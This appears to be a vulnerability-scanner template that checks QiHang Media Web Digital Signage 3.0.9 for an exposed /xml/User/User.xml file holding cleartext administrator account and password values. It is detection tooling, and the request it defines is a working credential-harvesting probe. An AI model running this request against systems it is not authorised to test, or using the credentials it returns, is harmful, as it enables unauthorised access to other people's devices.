id: qihang-media-disclosure

info:
  name: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credentials Disclosure
  author: gy741
  severity: high
  description: |
    QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: qihang,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/xml/User/User.xml"

    matchers:
      - type: word
        part: body
        words:
          - "<?xml version"
          - "<Users>"
          - "account="
          - "password="
        condition: and

# Enhanced by mp on 2022/05/30
